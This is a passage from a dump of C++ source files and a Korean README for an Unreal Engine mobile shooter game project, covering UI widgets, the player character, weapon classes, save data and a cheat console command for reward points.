쿨타임\n\n\n\t//=============================================\n\t// Division\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Division MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentDivisionSpawn* DivisionSpawnComponent;\n};\n" }, { "alpha_fraction": 0.6509186625480652, "alphanum_fraction": 0.6614173054695129, "avg_line_length": 25.581396102905273, "blob_id": "aa0b901697549451c56979b5b3fa175d28d8b107", "content_id": "6e6eb7c840f7fc4b51ffd0c33f847b21b3a3b117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2506, "license_type": "no_license", "max_line_length": 94, "num_lines": 86, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetPlayStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\n\t\teMaxWeaponSlotIndex = PG_MAX_WEAPON_SLOT,\t// 최대 장착 가능한 무기의 수\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\t\npublic :\n\tvoid InitWeaponBoxData();\n\tbool InitWeaponBoxData(bool bEnable, int32 nSlotIndex, int32 nWeaponTableIndex, int32 nAmmo);\n\n\t// 화면에 현재 착용중인 무기를 표시한다.\n\tvoid SetSelectWeapon(int32 nSlotIndex);\n\npublic :\n\t//=====================================================\n\t// Reward Point\n\t//=====================================================\n\t// 포인트 획득 업데이트\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid OnChangeRewardPoint();\n\n\t//=====================================================\n\t// 스테이지 클리어 목표 현황\n\t//=====================================================\n\t// 현재 몬스터 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateFlag();\n\t// 몬스터 필살기 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateLethal();\n\t// 타이머 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid 
OnUpdateTime();\n\n\t//=====================================================\n\t// 무기 슬롯\n\t//=====================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateWeaponAmmo(int32 nSlotIndex, int32 nAmmo);\n\t// 해당 SlotIndex의 무기를 변경 요청하였다.\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnChangeEquipWeaponIndex(int32 nSlotIndex);\n\nprivate :\n\tclass UPG_UserWidgetWeaponBox* GetUserWidgetWeaponBox(int32 nSlotIndex);\n\tclass UOverlay* GetOverlaySelectWeapon(int32 nSlotIndex);\n\nprotected:\n\t// 스테이지 클리어 목표 현황\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetStageClearTarget* WB_StageClearTarget;\n\n\t// 무기 슬롯\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_0;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_1;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_2;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_0;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_1;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_2;\n};\n" }, { "alpha_fraction": 0.7631257772445679, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 21.135135650634766, "blob_id": "e0e6ead3587c69457d624d0b026cf64f44c96ea5", "content_id": "4b5d9c7469fbbc8a7eaa36eab704a536cbc6f36b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayStageWeaponBag.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetPlayStageWeaponBag.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayStageWeaponBag : public UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\teMaxWeaponSlot = PG_MAX_WEAPON_SLOT,\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tbool SetSlotWaponIndex(int32 nSlotIndex, int32 nWeaponIndex);\n\tbool SetSlotWeaponAmmo(int32 nSlotIndex, int32 nAmmo);\n\tbool SetEnableSlot(int32 nSlotIndex, bool bEnable);\n\tvoid SetEnableLightBox(int32 nEnableSlotIndex);\n\nprotected:\n\tvoid OnBtnWeaponSlotClicked(int32 nSlotIndex);\n\nprotected:\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetWeaponBox, WB_WeaponSlot);\n};\n" }, { "alpha_fraction": 0.7358871102333069, "alphanum_fraction": 0.7399193644523621, "avg_line_length": 16.714284896850586, "blob_id": "c5dda789d1a1c6ce7913d5e753d54e3cce271911", "content_id": "3bd513dbf6c655095f218434c7bf6489b139d729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 498, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Source/Project_Gun/Public/Game/AD/PG_ADData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PROJECT_GUN_API PG_ADData\n{\npublic:\n\tPG_ADData();\n\t~PG_ADData();\n\npublic :\n\tvoid Init(class UPG_GameInstance* pGameInstance);\n\tvoid Update(float DeltaTime);\n\n\tvoid\tReset(EADType ekADType);\n\tint32\tGetRemainReViewableTime(EADType 
ekADType);\n\n\tbool\tIsAbleViewAD(EADType ekADType);\n\nprivate :\n\tUPROPERTY()\n\tTArray<float> m_kRemainReViewableTime;\n};\n" }, { "alpha_fraction": 0.752525269985199, "alphanum_fraction": 0.7550504803657532, "avg_line_length": 19.842105865478516, "blob_id": "0f87206c96c80d1f7cc365b423f55032daef5da5", "content_id": "c463d3deab62c87cbc59fba57eb7f03d7c0a4bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 810, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponFlameGun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n\n#include \"PG_WeaponFlameGun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponFlameGun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_WeaponFlameGun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Tick(float DeltaTime) override;\n\tvirtual void Destroyed() override;\n\npublic :\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate :\n\tvoid RemoveCurrFireFlame();\n\nprivate :\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireFlame;\t\t// 현재 화염 방사중인 Flame Projectile\n\n\tfloat FlameLength = 0.0f;\n};\n" }, { "alpha_fraction": 0.5857515335083008, "alphanum_fraction": 0.5885229706764221, "avg_line_length": 33.65536880493164, "blob_id": "2817bb5bd334def08410f2b57e55dea19cabda4e", "content_id": "878b63bff5b24f74ee30cb184ee6160c4e42d0fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6286, "license_type": "no_license", "max_line_length": 195, "num_lines": 177, "path": "/Source/Project_Gun/Public/Character/PG_MyChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_Char.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_MyChar.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_MyChar : public APG_Char\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_MyChar();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnConstruction(const FTransform& Transform) override;\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\nprotected:\n\tvoid UpdateRotation(float DeltaTime);\n\tvoid UpdateCamera(float DeltaTime);\n\tvoid UpdateMovement(float DeltaTime);\n\npublic :\n\tUFUNCTION(BlueprintCallable, Category = \"PG TargetMonster\")\n\tbool IsTargetMonster();\t\t// 몬스터 타겟팅 여부\n\n\t//==========================================================\n\t// Character Stat\n\t//==========================================================\n\tfloat GetMaxSpeed();\t\t// 이동속도\n\tfloat GetAttackRange();\t\t// 
Attack range\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tbool EquipWeapon(int32 nWeaponTalbeIndex);\t\t// Equip a weapon\n\tvoid Fire() override;\t\t\t\t\t\t\t// Fire the weapon\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tbool EquipLethalAttack(int32 LethalAttackID);\t// Equip a lethal-attack skill\n\tbool UnEquipLethalAttack();\n\npublic :\n\tUFUNCTION()\n\tvirtual void OnGenerateOverlabEvent(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\tvoid OnAttackedByMonster();\t\t// Attacked by a monster\n\tvoid OnPlayerWorldOut();\t\t// Fell off the map. (Kill Z)\n\tvoid OnDefaultAttackMonsterKill(class APG_MonChar* AMon);\t// Monster killed\n\tvoid OnChangeWeapon(int32 nWeaponTableIndex);\n\nprivate :\n\t//==========================================================\n\t// Camera\n\t//==========================================================\n\tenum class ECameraView : int\n\t{\n\t\teCV_QuaterView = 0,\n\t\teCV_Fly,\n\t};\n\n\tvoid SetCameraView(ECameraView eCameraView);\n\n\t//==========================================================\n\t// Character Movement\n\t//==========================================================\n\tvoid UpDown(float NewAxisValue);\n\tvoid LeftRight(float NewAxisValue);\n\tvoid TouchReleased();\n\n\tvoid UpdateMovementData();\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tUFUNCTION()\n\tbool SetWeapon(APG_Weapon* NewWeapon);\n#ifdef TEST_CODE\n\tvoid WeaponEquipRlife();\n\tvoid WeaponEquipFlame();\n\tvoid WeaponEquipShutgun();\n\tvoid WeaponEquipLaserBeam();\n\tvoid WeaponEquipGrandleLauncher();\n#endif // TEST_CODE\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tUFUNCTION()\n\tbool SetLethalAttack(class APG_LethalAttack* NewLethalAttack);\n\n\tclass APG_MonChar* FindTargetToMonster();\n\nprivate :\n\t//==========================================================\n\t// Animation\n\t//==========================================================\n\tUPROPERTY()\n\tclass UPG_AnimIns_MyChar* ABAnimInstance;\n\n\t//==========================================================\n\t// Camera\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CameraInfo\")\n\tUSpringArmComponent* SpringArm;\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CameraInfo\")\n\tUCameraComponent* Camera;\n\n\t// CharacterCameraTable (character camera settings)\n\tfloat\t\tArmLengthTo = 0.0f;\n\tFRotator\tArmRotationTo = FRotator::ZeroRotator;\n\tfloat\t\tArmLengthSpeed = 0.0f;\n\tfloat\t\tArmRotationSpeed = 0.0f;\n\tECameraView m_eCurrentCameraView;\n\n\tUPROPERTY()\n\tclass APG_PlayerController*\tm_pPlayerContorller;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tPitch;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tYaw;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tRoll;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tArmLength;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tFov;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG 
CharacterCameraTableInfo\")\n\tfloat\t\tFov;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tScreenY;\n\n\t//==========================================================\n\t// CharacterMovementTable (캐릭터 이동관련 정보)\n\t//==========================================================\n\tFVector\t\tDirectionToMove = FVector::ZeroVector;\n\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tMaxSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAccelerationSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tBodyRotateSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAttackBodyRotateSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAttackUpperBodyRotateSpeed;\n\n\tfloat\t\tMonsterTargetAngle = 0.0f;\n\tFRotator\tTargetRotation = FRotator::ZeroRotator;\n\n\t//==========================================================\n\t// Weapon (무기)\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG WeaponInfo\")\n\tTWeakObjectPtr<class APG_Weapon> CurrentWeapon = nullptr;\n\n\t//==========================================================\n\t// LethalAttack (필살기)\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG LethalAttackInfo\")\n\tTWeakObjectPtr<class APG_LethalAttack> CurrentLethalAttack = nullptr;\n};\n" }, { "alpha_fraction": 0.6847545504570007, "alphanum_fraction": 0.7157622575759888, "avg_line_length": 15.125, "blob_id": "b63aab6c3063cc057fb311771c5069b801c75458", "content_id": "9b092233ccb5b08353efedd73a8e1e098dbfeaca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 621, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/README.md", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "# ProjectGun-wkdtpeo\n언리얼 입문 및 습작용 프로젝트 관리용 (Source)\n\n소스코드는 Git으로 관리하며, 리소스는 SVN으로 관리하도록 프로젝트 구축하였습니다.\n\nUnreal Ver. 4.25.4\n\nSource(Git) : https://github.com/wkdtpeo/ProjectGun-wkdtpeo.git\n\nResouce(SVN) : http://wkdtpeo.iptime.org:1001/svn/Portfolio/ProjectGun/\n\n제작인원 : 3명\n\n프로그래밍 : 1명\n\n기획 : 1명\n\n모델러 : 1명\n\n\n\nSVN 서버는 개인 컴퓨터에 구축된 상태이므로 항상 서버가 열려있진 않습니다.\n\n필요시 연락을 주시면 서버를 열도록 하겠습니다. 
([email protected])\n" }, { "alpha_fraction": 0.7594837546348572, "alphanum_fraction": 0.7712162733078003, "avg_line_length": 24.316831588745117, "blob_id": "c967fc78582de4aa55c7f73a3773b81420aa7c0f", "content_id": "6f649a71c7cb5048a4af781453394cae5a4c3237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2605, "license_type": "no_license", "max_line_length": 99, "num_lines": 101, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShopWeaponSlot.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetShopWeaponSlot.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnItemBuyWeapon);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShopWeaponSlot : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION()\n\tvoid UpdateLayout();\n\tUFUNCTION()\n\tvoid SetUnlockLayout(bool bUnlock);\n\tUFUNCTION()\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex, int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid SetWepaon(int32 nPrice);\n\tUFUNCTION()\n\tvoid SetPowerLevel(int32 nPowerLevel, int32 nPrice);\n\tUFUNCTION()\n\tvoid SetAmmoLevel(int32 nAmmoLevel, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription, int32 nValue);\n\nprotected :\n\t// 무기 언락 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnWeapon();\n\t// 파워 레벨업 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnPower();\n\t// 탄약 확장 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnAmmo();\n\n\tUFUNCTION()\n\tvoid OnBuyOK(int32 nValue);\n\tUFUNCTION()\n\tvoid OnBuyCancel(int32 nValue);\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\t\npublic:\n\tFOnItemBuyWeapon OnItemBuyWeapon;\n\nprotected :\n\t// Weapon\n\tPG_WIDGET_DECLAR(UButton, BtnWeapon);\n\tPG_WIDGET_DECLAR(UImage, ImgWeaponLock);\n\tPG_WIDGET_DECLAR(UTextBlock, TextWeaponPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasWeaponPrice);\n\t\n\n\t// Power\n\tPG_WIDGET_DECLAR(UButton, BtnPower);\n\tPG_WIDGET_DECLAR(UTextBlock, TextPowerLevel);\n\tPG_WIDGET_DECLAR(UTextBlock, TextPowerPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasPowerPrice);\n\n\t// Ammo\n\tPG_WIDGET_DECLAR(UButton, BtnAmmo);\n\tPG_WIDGET_DECLAR(UTextBlock, TextAmmoLevel);\n\tPG_WIDGET_DECLAR(UTextBlock, TextAmmoPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasAmmoPrice);\n\nprivate :\n\tint32 m_nSlotIndex = PG_INVALID_INDEX;\n\tint32 m_nWeaponIndex = PG_INVALID_INDEX;\n\tint32 m_nPowerLevel = PG_INVALID_INDEX;\n\tint32 m_nAmmoLevel = PG_INVALID_INDEX;\n\tbool m_bIsMaxPower = false;\n\tbool m_bIsMaxAmmo = false;\n\tbool m_bIsAbleBuyWepaon = false;\n\tbool m_bIsAbleBuyPower = false;\n\tbool m_bIsAbleBuyAmmo = false;\n\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n\n\t// 임시 작업\n\tUPROPERTY()\n\tclass UPG_UserWidgetBuyPopup* m_pUserWidgetBuyPopup = nullptr;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n" }, { "alpha_fraction": 0.7372803092002869, "alphanum_fraction": 0.7483811378479004, "avg_line_length": 23.56818199157715, "blob_id": "884bb94cb8ccc54f577f8974cf3b33b831eb20db", "content_id": 
"adc01b9c1ba4f8e8630fd599cd5c65c1763985d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/Source/Project_Gun/Public/SaveData/PG_SavePlayerData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/SaveGame.h>\n#include \"PG_SavePlayerData.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_SavePlayerData : public USaveGame\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_SavePlayerData();\n\n\t// 마지막으로 플레이한 스테이지 ID\n\tUPROPERTY(VisibleAnywhere, Category = \"PG StageData\")\n\tint32 m_nLastPlayStageID;\n\n\t// 보유중인 포인트\n\tUPROPERTY(VisibleAnywhere, Category = \"PG StageData\")\n\tint32 m_nRewardPoint;\n\n\t// 3번째 무기 슬롯 확장 여부 (유료로 확장 가능)\n\tUPROPERTY(VisibleAnywhere, Category = \"PG PlayerData\")\n\tbool m_bExtendWeaponSlot;\n\n\t// 현재 장착중인 무기 정보 (최대 3개), TArray<PG_MAX_WEAPON_SLOT>\n\tUPROPERTY(VisibleAnywhere, Category = \"PG PlayerData\")\n\tTArray<int32> m_kEquipWeaponTableIndex;\n\n\t// 구매하여 소유중인 무기 정보, TMap<WeaponTableIndex, FPGWeaponOwnData>\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\")\n\tTMap<int32, struct FPGWeaponOwnData> WeaponOwnData;\n\t\npublic :\n\tstatic FString GetSlotName();\n\tstatic int32 GetPlayerIndex();\n};\n" }, { "alpha_fraction": 0.8065434098243713, "alphanum_fraction": 0.8065434098243713, "avg_line_length": 28.33333396911621, "blob_id": "51dff09fee06d843a07909c6f60da4b569509c99", "content_id": "0d1daab772ca6b7e54ad47eb6df9e9ebe442b8e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 705, "license_type": "no_license", "max_line_length": 97, "num_lines": 24, "path": "/Source/Project_Gun/Public/UI/PG_VirtualJoystick.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Widgets/Input/SVirtualJoystick.h>\n\nclass SPG_VirtualJoystick : public SVirtualJoystick\n{\n\npublic:\n\tSLATE_USER_ARGS(SPG_VirtualJoystick)\n\t{}\n\tSLATE_END_ARGS()\n\n\tvirtual void Construct(const FArguments& InArgs);\n\tvirtual FReply OnTouchStarted(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\tvirtual FReply OnTouchMoved(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\tvirtual FReply OnTouchEnded(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\n\tvoid BindPlayerController(class APG_PlayerController* NewPlayerController);\n\nprivate :\n\tclass APG_PlayerController* MyPlayerController;\n};" }, { "alpha_fraction": 0.7534818649291992, "alphanum_fraction": 0.7548746466636658, "avg_line_length": 23.355932235717773, "blob_id": "4a84da051e36680d84dbbcfb932ad3c99588f192", "content_id": "bbea6d78a4c4165cd8817f1c7437ad0c1eebf2ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 99, "num_lines": 59, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandShowMeTheMoney.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include 
\"Game/Console/Commands/PG_CommandShowMeTheMoney.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nPG_CommandShowMeTheMoney::PG_CommandShowMeTheMoney()\n{\n}\n\nPG_CommandShowMeTheMoney::~PG_CommandShowMeTheMoney()\n{\n}\n\n\nvoid PG_CommandShowMeTheMoney::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandShowMeTheMoney::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tint32 nRewardPoint = m_pConsoleVariable->GetInt();\n\n\tauto pGameMdoeBase = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tif (nullptr == pGameMdoeBase)\n\t{\n\t\tABLOG(Warning, TEXT(\"Can only be used in stage play.\"));\n\t\treturn;\n\t}\n\n\tauto pSavePlayerData = pGameMdoeBase->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tpSavePlayerData->m_nRewardPoint = nRewardPoint;\n\tpGameMdoeBase->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(G_PGWorld->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tABLOG(Error, TEXT(\"InitPlayerData Error\"));\n\t}\n}\n\nvoid PG_CommandShowMeTheMoney::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7543520331382751, "alphanum_fraction": 0.7543520331382751, "avg_line_length": 18.148147583007812, "blob_id": "3f2a4006607425ecb88bd247ca9dd42b63a4f060", "content_id": "32417aa42d72d920f9b246e64393366b9ff209d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 519, "license_type": "no_license", "max_line_length": 79, "num_lines": 27, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetSkillSlot.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetSkillSlot.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetSkillSlot : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid SetEnable(bool bEnalbe);\n\nprotected :\n\tPG_WIDGET_DECLAR(UButton, BtnSkill);\n\tPG_WIDGET_DECLAR(UOverlay, OverlayLightBox);\n};\n" }, { "alpha_fraction": 0.7835178375244141, "alphanum_fraction": 0.7933579087257385, "avg_line_length": 24.40625, "blob_id": "3ea47125e8af2295dc1ed91ac6197bc206e7fe4d", "content_id": "9ef654f4ec655589b107d94fd86e9cb9b7b67ab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1684, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetWeaponBox.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetWeaponBox.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnWeaponClicked_WeaponIndex, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnWeaponClicked_SlotIndex, int32);\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API 
UPG_UserWidgetWeaponBox : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetSlotIndex(int32 nSlotIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetAmmo(int32 nAmmo);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnable(bool bEnable);\n\tvoid SetEnableLightBox(bool bEnable);\n\n\tUFUNCTION(BlueprintCallable)\n\tint32 GetWeaponIndex()\t\t{ return WeaponIndex;\t}\n\npublic :\n\t// Weapon 버튼을 누르면 설정된 WeaponIndex를 전달한다.\n\tFOnBtnWeaponClicked_WeaponIndex OnBtnWeaponClicked_WeaponIndex;\n\n\t// Weapon 버튼을 누르면 장착된 SlotIndex를 전달한다.\n\tFOnBtnWeaponClicked_SlotIndex OnBtnWeaponClicked_SlotIndex;\n\nprivate :\n\tUFUNCTION()\n\tvoid OnBtnWeaponClicked();\n\nprotected :\n\tPG_WIDGET_DECLAR(UButton, Btn_Weapon);\n\tPG_WIDGET_DECLAR(UImage, Img_IconAmmo);\n\tPG_WIDGET_DECLAR(UTextBlock, 